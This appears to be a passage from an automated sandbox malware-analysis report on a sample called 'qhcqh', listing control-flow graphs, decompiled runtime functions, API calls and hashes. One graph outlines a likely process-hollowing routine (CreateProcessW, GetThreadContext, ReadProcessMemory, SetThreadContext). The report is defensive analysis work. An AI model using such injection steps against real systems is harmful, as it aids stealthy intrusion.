                                                                                                                        control_flow_graph 140 27f2b2a-27f2b45 call 27f297f 143 27f2b48-27f2b4c 140->143 144 27f2b4e-27f2b62 143->144 145 27f2b64-27f2b71 143->145 144->143 146 27f2b74-27f2b78 145->146 147 27f2b7a-27f2b8e 146->147 148 27f2b90-27f2b9d 146->148 147->146 149 27f2ba0-27f2ba4 148->149 150 27f2bbc-27f2c9a call 27f2993 * 8 149->150 151 27f2ba6-27f2bba 149->151 168 27f2c9c-27f2ca6 150->168 169 27f2cb1 150->169 151->149 168->169 170 27f2ca8-27f2caf 168->170 171 27f2cb5-27f2cd1 169->171 170->171 173 27f2cda 171->173 174 27f2cd3-27f2cd5 171->174 176 27f2ce1-27f2d09 CreateProcessW 173->176 175 27f3054-27f3057 174->175 177 27f2d0b 176->177 178 27f2d10-27f2d29 GetThreadContext 176->178 179 27f3008-27f300c 177->179 180 27f2d2b 178->180 181 27f2d30-27f2d4d ReadProcessMemory 178->181 184 27f300e-27f3012 179->184 185 27f3051-27f3053 179->185 180->179 182 27f2d4f 181->182 183 27f2d54-27f2d5d 181->183 182->179 186 27f2d5f-27f2d6e 183->186 187 27f2d84-27f2da3 call 27f3ccb 183->187 188 27f3025-27f3029 184->188 189 27f3014-27f301f 184->189 185->175 186->187 192 27f2d70-27f2d7d call 27f3c36 186->192 199 27f2daa-27f2dcb call 27f3de5 187->199 200 27f2da5 187->200 190 27f302b 188->190 191 27f3031-27f3035 188->191 189->188 190->191 194 27f303d-27f3041 191->194 195 27f3037 191->195 192->187 206 27f2d7f 192->206 201 27f304d-27f304f 194->201 202 27f3043-27f3048 call 27f3c36 194->202 195->194 208 27f2dcd-27f2dd4 199->208 209 27f2e10-27f2e30 call 27f3de5 199->209 200->179 201->175 202->201 206->179 210 27f2e0b 208->210 211 27f2dd6-27f2e02 call 27f3de5 208->211 216 27f2e37-27f2e4c call 27f29fa 209->216 217 27f2e32 209->217 210->179 219 27f2e09 211->219 220 27f2e04 211->220 222 27f2e55-27f2e5f 216->222 217->179 219->209 220->179 223 27f2e91-27f2e95 222->223 224 27f2e61-27f2e8f call 27f29fa 222->224 226 27f2e9b-27f2ea9 223->226 227 27f2f75-27f2f91 call 27f3a84 223->227 224->222 226->227 230 27f2eaf-27f2ebd 226->230 234 27f2f95-27f2fb6 SetThreadContext 227->234 235 27f2f93 227->235 230->227 233 27f2ec3-27f2ee3 230->233 236 27f2ee6-27f2eea 233->236 237 27f2fba-27f2fc4 call 27f3b85 234->237 238 27f2fb8 234->238 235->179 236->227 239 27f2ef0-27f2f05 236->239 247 27f2fc8-27f2fcc 237->247 248 27f2fc6 237->248 238->179 241 27f2f17-27f2f1b 239->241 243 27f2f1d-27f2f29 241->243 244 27f2f58-27f2f70 241->244 245 27f2f2b-27f2f54 243->245 246 27f2f56 243->246 244->236 245->246 246->241 250 27f2fce 247->250 251 27f2fd4-27f2fd8 247->251 248->179 250->251 252 27f2fda 251->252 253 27f2fe0-27f2fe4 251->253 252->253 254 27f2fec-27f2ff0 253->254 255 27f2fe6 253->255 256 27f2ffc-27f3002 254->256 257 27f2ff2-27f2ff7 call 27f3c36 254->257 255->254 256->176 256->179 257->256
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.261999809.00000000027F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 027F2000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_27f2000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: D
                                                                                                                        • API String ID: 0-2746444292
                                                                                                                        • Opcode ID: 5c11bab74f206774faca5e2114dcc493676c6a7690bf60f6870f5c22a3dd4c20
                                                                                                                        • Instruction ID: a22515d8dc8df47a8db28998619c73b18da38b1392658bb189075523f8c4e637
                                                                                                                        • Opcode Fuzzy Hash: 5c11bab74f206774faca5e2114dcc493676c6a7690bf60f6870f5c22a3dd4c20
                                                                                                                        • Instruction Fuzzy Hash: 9E020570D08209EFDB95DF94CD85BADBBB6BF04305F2040A9EA15BB291D774AA84CF10
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00C5194A Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 297 c5194a-c5195e call c52d64 300 c51997 297->300 301 c51960-c51963 297->301 302 c51999-c5199e call c52da9 300->302 301->300 303 c51965-c51968 301->303 304 c5199f-c519ba call c5472d call c51740 303->304 305 c5196a-c5196e 303->305 317 c519bf-c519d4 call c519d6 304->317 307 c51970-c5197c call c55600 305->307 308 c5197f-c51994 call c534da call c54636 305->308 307->308 308->300 317->302
                                                                                                                        C-Code - Quality: 70%
                                                                                                                        			E00C5194A(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t19;
				intOrPtr _t22;
				void* _t33;
				void* _t34;

				_t30 = __edi;
				_t29 = __edx;
				_push(0xc);
				_push(0xc5d400);
				E00C52D64(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t33 - 0x1c)) = 0;
				if( *((intOrPtr*)(_t33 + 0x10)) == 0 ||  *((intOrPtr*)(_t33 + 0x14)) == 0) {
					L6:
					_t19 = 0;
				} else {
					if( *((intOrPtr*)(_t33 + 0x18)) != 0) {
						E00C5472D( *((intOrPtr*)(_t33 + 0x18)));
						 *((intOrPtr*)(_t33 - 4)) = 0;
						_t22 = E00C51740(__edx,  *((intOrPtr*)(_t33 + 8)),  *((intOrPtr*)(_t33 + 0xc)),  *((intOrPtr*)(_t33 + 0x10)),  *((intOrPtr*)(_t33 + 0x14)),  *((intOrPtr*)(_t33 + 0x18))); // executed
						 *((intOrPtr*)(_t33 - 0x1c)) = _t22;
						 *((intOrPtr*)(_t33 - 4)) = 0xfffffffe;
						E00C519D6();
						_t19 =  *((intOrPtr*)(_t33 - 0x1c));
					} else {
						_t41 =  *((intOrPtr*)(_t33 + 0xc)) - 0xffffffff;
						if( *((intOrPtr*)(_t33 + 0xc)) != 0xffffffff) {
							E00C55600(__edi,  *((intOrPtr*)(_t33 + 8)), 0,  *((intOrPtr*)(_t33 + 0xc)));
							_t34 = _t34 + 0xc;
						}
						 *((intOrPtr*)(E00C534DA(_t41))) = 0x16;
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E00C54636(_t29, _t30, 0);
						goto L6;
					}
				}
				return E00C52DA9(_t19);
			}







                                                                                                                        0x00c5194a
                                                                                                                        0x00c5194a
                                                                                                                        0x00c5194a
                                                                                                                        0x00c5194c
                                                                                                                        0x00c51951
                                                                                                                        0x00c51958
                                                                                                                        0x00c5195e
                                                                                                                        0x00c51997
                                                                                                                        0x00c51997
                                                                                                                        0x00c51965
                                                                                                                        0x00c51968
                                                                                                                        0x00c519a2
                                                                                                                        0x00c519a8
                                                                                                                        0x00c519ba
                                                                                                                        0x00c519c2
                                                                                                                        0x00c519c5
                                                                                                                        0x00c519cc
                                                                                                                        0x00c519d1
                                                                                                                        0x00c5196a
                                                                                                                        0x00c5196a
                                                                                                                        0x00c5196e
                                                                                                                        0x00c51977
                                                                                                                        0x00c5197c
                                                                                                                        0x00c5197c
                                                                                                                        0x00c51984
                                                                                                                        0x00c5198a
                                                                                                                        0x00c5198b
                                                                                                                        0x00c5198c
                                                                                                                        0x00c5198d
                                                                                                                        0x00c5198e
                                                                                                                        0x00c5198f
                                                                                                                        0x00000000
                                                                                                                        0x00c51994
                                                                                                                        0x00c51968
                                                                                                                        0x00c5199e

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.261926727.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.261919693.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.261949779.0000000000C5C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.261956673.0000000000C5F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.261963259.0000000000C62000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_c50000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __lock_file_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 26237723-0
                                                                                                                        • Opcode ID: 9197ccc31af916685070f3ab41ee5f1217f8697a4b500acb19b848ab8f024e66
                                                                                                                        • Instruction ID: dd3bd0df03303088ded6e915637e4b330dc8ed7564a3a2f8b0a965175159f182
                                                                                                                        • Opcode Fuzzy Hash: 9197ccc31af916685070f3ab41ee5f1217f8697a4b500acb19b848ab8f024e66
                                                                                                                        • Instruction Fuzzy Hash: 47015279800209EBCF22AF64CC05A9E7F71AF05752F048115FC2416161D73586E6EFD5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 027F3158 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 027F30FA: GetSystemInfo.KERNELBASE(?), ref: 027F3117
                                                                                                                        • VirtualAllocExNuma.KERNELBASE(00000000), ref: 027F31BD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.261999809.00000000027F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 027F2000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_27f2000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocInfoNumaSystemVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 449148690-0
                                                                                                                        • Opcode ID: 5104fe00cea5b6b43bfce270a0a2c81ff317ca7eb47637b87448d486c4f4107a
                                                                                                                        • Instruction ID: e2c6edb9b79bfa27e5e19f23cff49540fdfabc675505cf417d6b92c1f3dc2278
                                                                                                                        • Opcode Fuzzy Hash: 5104fe00cea5b6b43bfce270a0a2c81ff317ca7eb47637b87448d486c4f4107a
                                                                                                                        • Instruction Fuzzy Hash: 29F06270D4C348BAEB82BBF08C0DB5D767ADF00702F1048E5AF54B7385DA7846008E65
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00C52F4C Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 355 c52f4c-c52f6e HeapCreate 356 c52f70-c52f71 355->356 357 c52f72-c52f7b 355->357
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00C52F4C(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0xc60204 = _t6;
				if(_t6 != 0) {
					 *0xc61c5c = 1;
					return 1;
				} else {
					return _t6;
				}
			}




                                                                                                                        0x00c52f61
                                                                                                                        0x00c52f67
                                                                                                                        0x00c52f6e
                                                                                                                        0x00c52f75
                                                                                                                        0x00c52f7b
                                                                                                                        0x00c52f71
                                                                                                                        0x00c52f71
                                                                                                                        0x00c52f71

                                                                                                                        APIs
                                                                                                                        • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00C52F61
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.261926727.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.261919693.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.261949779.0000000000C5C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.261956673.0000000000C5F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.261963259.0000000000C62000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_c50000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 10892065-0
                                                                                                                        • Opcode ID: b49871a32ba04867adb92fc83b5492f18d1e30c29617e4f98e493476e032cbb1
                                                                                                                        • Instruction ID: e60f31398dd33c80c21b760fc4182fa03989afeaba81aec1229840c2c0feaf08
                                                                                                                        • Opcode Fuzzy Hash: b49871a32ba04867adb92fc83b5492f18d1e30c29617e4f98e493476e032cbb1
                                                                                                                        • Instruction Fuzzy Hash: 43D05E7A594345AEDB105FB67C0872A3BDC9784396F18C435F81DC6190F9B0D5908A04
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00C51729 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 358 c51729-c5173f call c51665
                                                                                                                        C-Code - Quality: 25%
                                                                                                                        			E00C51729(intOrPtr _a4, intOrPtr _a8) {
				void* __ebp;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t10;

				_push(0x40);
				_push(_a8);
				_push(_a4);
				_t3 = E00C51665(_t4, _t5, _t6, _t7, _t10); // executed
				return _t3;
			}










                                                                                                                        0x00c5172e
                                                                                                                        0x00c51730
                                                                                                                        0x00c51733
                                                                                                                        0x00c51736
                                                                                                                        0x00c5173f

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.261926727.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.261919693.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.261949779.0000000000C5C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.261956673.0000000000C5F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.261963259.0000000000C62000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_c50000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __fsopen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3646066109-0
                                                                                                                        • Opcode ID: b5f1e3f8c0985568a2b975540194b91a49099896255c8aa19d8b1f82aed34cac
                                                                                                                        • Instruction ID: 3bdcbb56f01a3ea2c9760f3d6b48d8dc9534c10cd01d2069671af07819590ff2
                                                                                                                        • Opcode Fuzzy Hash: b5f1e3f8c0985568a2b975540194b91a49099896255c8aa19d8b1f82aed34cac
                                                                                                                        • Instruction Fuzzy Hash: BCC09B7644010CB7CF111982DC07F453F19D7C07A4F084010FF1C191619A73D5659589
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00C53FD4 Relevance: 1.5, APIs: 1, Instructions: 4COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 361 c53fd4-c53fd6 call c53f62 363 c53fdb-c53fdc 361->363
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00C53FD4() {
				void* _t1;

				_t1 = E00C53F62(0); // executed
				return _t1;
			}




                                                                                                                        0x00c53fd6
                                                                                                                        0x00c53fdc

                                                                                                                        APIs
                                                                                                                        • __encode_pointer.LIBCMT ref: 00C53FD6
                                                                                                                          • Part of subcall function 00C53F62: TlsGetValue.KERNEL32(00000000,?,00C53FDB,00000000,00C56A36,00C60240,00000000,00000314,?,00C53423,00C60240,Microsoft Visual C++ Runtime Library,00012010), ref: 00C53F74
                                                                                                                          • Part of subcall function 00C53F62: TlsGetValue.KERNEL32(00000006,?,00C53FDB,00000000,00C56A36,00C60240,00000000,00000314,?,00C53423,00C60240,Microsoft Visual C++ Runtime Library,00012010), ref: 00C53F8B
                                                                                                                          • Part of subcall function 00C53F62: RtlEncodePointer.NTDLL(00000000,?,00C53FDB,00000000,00C56A36,00C60240,00000000,00000314,?,00C53423,00C60240,Microsoft Visual C++ Runtime Library,00012010), ref: 00C53FC9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.261926727.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.261919693.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.261949779.0000000000C5C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.261956673.0000000000C5F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.261963259.0000000000C62000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_c50000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Value$EncodePointer__encode_pointer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2585649348-0
                                                                                                                        • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                                                        • Instruction ID: fd1537288471ad487f8564dccc4ea7d1fcc69105dace882d02c109d951b305a5
                                                                                                                        • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 027F305A Relevance: 1.3, APIs: 1, Instructions: 60memoryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 421 27f305a-27f30a1 call 27f297f call 27f2993 * 2 VirtualAlloc 428 27f30a8-27f30b0 421->428 429 27f30a3-27f30a6 421->429 430 27f30f5-27f30f9 428->430 431 27f30b2-27f30bf 428->431 429->428 432 27f30c2-27f30c6 431->432 433 27f30de-27f30ef 432->433 434 27f30c8-27f30dc 432->434 433->430 434->432
                                                                                                                        APIs
                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,17D78400,00003000,00000004), ref: 027F3097
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.261999809.00000000027F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 027F2000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_27f2000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4275171209-0
                                                                                                                        • Opcode ID: fefa28e21f4d9309c1ecd3ac6253e750ecc73c234d91debfceddd181198d7f09
                                                                                                                        • Instruction ID: ffca0969c97eb5615cf09df2c72fd71931dd6c2ea7bb76196eabbbf5a2472af8
                                                                                                                        • Opcode Fuzzy Hash: fefa28e21f4d9309c1ecd3ac6253e750ecc73c234d91debfceddd181198d7f09
                                                                                                                        • Instruction Fuzzy Hash: 21110670D04218AFDB41EFA8CC89BAEBBB5EB04314F2084A5EA55B7391D7714A44CB90
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Non-executed Functions

                                                                                                                        Function 00C564EA Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 85%
                                                                                                                        			E00C564EA(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0xc5fbf8; // 0xf8d02c26
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0xc60820 = _t6;
				 *0xc6081c = _t22;
				 *0xc60818 = _t25;
				 *0xc60814 = _t21;
				 *0xc60810 = _t27;
				 *0xc6080c = _t26;
				 *0xc60838 = ss;
				 *0xc6082c = cs;
				 *0xc60808 = ds;
				 *0xc60804 = es;
				 *0xc60800 = fs;
				 *0xc607fc = gs;
				asm("pushfd");
				_pop( *0xc60830);
				 *0xc60824 =  *_t31;
				 *0xc60828 = _v0;
				 *0xc60834 =  &_a4;
				 *0xc60770 = 0x10001;
				_t11 =  *0xc60828; // 0x0
				 *0xc60724 = _t11;
				 *0xc60718 = 0xc0000409;
				 *0xc6071c = 1;
				_t12 =  *0xc5fbf8; // 0xf8d02c26
				_v812 = _t12;
				_t13 =  *0xc5fbfc; // 0x72fd3d9
				_v808 = _t13;
				 *0xc60768 = IsDebuggerPresent();
				_push(1);
				E00C57BC0(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0xc5d2ec);
				if( *0xc60768 == 0) {
					_push(1);
					E00C57BC0(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                                                                                                        0x00c564ea
                                                                                                                        0x00c564ea
                                                                                                                        0x00c564ea
                                                                                                                        0x00c564ea
                                                                                                                        0x00c564ea
                                                                                                                        0x00c564ea
                                                                                                                        0x00c564ea
                                                                                                                        0x00c564f0
                                                                                                                        0x00c564f2
                                                                                                                        0x00c564f2
                                                                                                                        0x00c59ba5
                                                                                                                        0x00c59baa
                                                                                                                        0x00c59bb0
                                                                                                                        0x00c59bb6
                                                                                                                        0x00c59bbc
                                                                                                                        0x00c59bc2
                                                                                                                        0x00c59bc8
                                                                                                                        0x00c59bcf
                                                                                                                        0x00c59bd6
                                                                                                                        0x00c59bdd
                                                                                                                        0x00c59be4
                                                                                                                        0x00c59beb
                                                                                                                        0x00c59bf2
                                                                                                                        0x00c59bf3
                                                                                                                        0x00c59bfc
                                                                                                                        0x00c59c04
                                                                                                                        0x00c59c0c
                                                                                                                        0x00c59c17
                                                                                                                        0x00c59c21
                                                                                                                        0x00c59c26
                                                                                                                        0x00c59c2b
                                                                                                                        0x00c59c35
                                                                                                                        0x00c59c3f
                                                                                                                        0x00c59c44
                                                                                                                        0x00c59c4a
                                                                                                                        0x00c59c4f
                                                                                                                        0x00c59c5b
                                                                                                                        0x00c59c60
                                                                                                                        0x00c59c62
                                                                                                                        0x00c59c6a
                                                                                                                        0x00c59c75
                                                                                                                        0x00c59c82
                                                                                                                        0x00c59c84
                                                                                                                        0x00c59c86
                                                                                                                        0x00c59c8b
                                                                                                                        0x00c59c9f

                                                                                                                        APIs
                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 00C59C55
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C59C6A
                                                                                                                        • UnhandledExceptionFilter.KERNEL32(00C5D2EC), ref: 00C59C75
                                                                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 00C59C91
                                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 00C59C98
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.261926727.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.261919693.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.261949779.0000000000C5C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.261956673.0000000000C5F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.261963259.0000000000C62000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_c50000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2579439406-0
                                                                                                                        • Opcode ID: 6308545dc2395d5f7a9a7b7cc509d73cfdc01916a7304ff66b74050d53cb78fb
                                                                                                                        • Instruction ID: e5fc4215cbcd68610ccca9ff04e8af3c2406579e30e826a48a95dd5616933788
                                                                                                                        • Opcode Fuzzy Hash: 6308545dc2395d5f7a9a7b7cc509d73cfdc01916a7304ff66b74050d53cb78fb
                                                                                                                        • Instruction Fuzzy Hash: 8721BFB8401305DFD760DF56E98474A3BE4FB4C312F20946AE909A32A2D7F19585CF99
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00C59E63 Relevance: 1.5, APIs: 1, Instructions: 27COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 89%
                                                                                                                        			E00C59E63(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, int _a4) {
				signed int _v8;
				char _v10;
				char _v16;
				signed int _t7;
				signed int _t10;
				signed int _t12;
				intOrPtr _t14;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t20;
				signed int _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t18 = __edx;
				_t14 = __ebx;
				_t7 =  *0xc5fbf8; // 0xf8d02c26
				_v8 = _t7 ^ _t21;
				_v10 = 0;
				_t10 = GetLocaleInfoA(_a4, 0x1004,  &_v16, 6);
				if(_t10 != 0) {
					_t12 = E00C5A0D7( &_v16);
				} else {
					_t12 = _t10 | 0xffffffff;
				}
				return E00C564EA(_t12, _t14, _v8 ^ _t21, _t18, _t19, _t20);
			}














                                                                                                                        0x00c59e63
                                                                                                                        0x00c59e63
                                                                                                                        0x00c59e63
                                                                                                                        0x00c59e63
                                                                                                                        0x00c59e6b
                                                                                                                        0x00c59e72
                                                                                                                        0x00c59e83
                                                                                                                        0x00c59e87
                                                                                                                        0x00c59e8f
                                                                                                                        0x00c59e9a
                                                                                                                        0x00c59e91
                                                                                                                        0x00c59e91
                                                                                                                        0x00c59e91
                                                                                                                        0x00c59eab

                                                                                                                        APIs
                                                                                                                        • GetLocaleInfoA.KERNEL32(00000100,00001004,00C54A16,00000006,00C54A16,00000100,00000000,?,?,?,?,7FFFFFFF,?,00004000,7FFFFFFF,00000000), ref: 00C59E87
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.261926727.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.261919693.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.261949779.0000000000C5C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.261956673.0000000000C5F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.261963259.0000000000C62000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_c50000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoLocale
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2299586839-0
                                                                                                                        • Opcode ID: 7738d2035e262eb35be122c716779021df85bf8459f247bdf3ff49382c4958bf
                                                                                                                        • Instruction ID: a6af7511ba0d61f73fa3a40835a1208b99df012b4e833dd6734065e7594d6e14
                                                                                                                        • Opcode Fuzzy Hash: 7738d2035e262eb35be122c716779021df85bf8459f247bdf3ff49382c4958bf
                                                                                                                        • Instruction Fuzzy Hash: CEF0E538A00208EBDB00DBA5C806BAE77A9EB48316F504165E921E70C0DB70DA889619
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00C55BF4 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00C55BF4() {

				SetUnhandledExceptionFilter(E00C55BB2);
				return 0;
			}



                                                                                                                        0x00c55bf9
                                                                                                                        0x00c55c01

                                                                                                                        APIs
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00005BB2), ref: 00C55BF9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.261926727.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.261919693.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.261949779.0000000000C5C000.00000002.00000001.01000000.00000004.sdmpDownload File
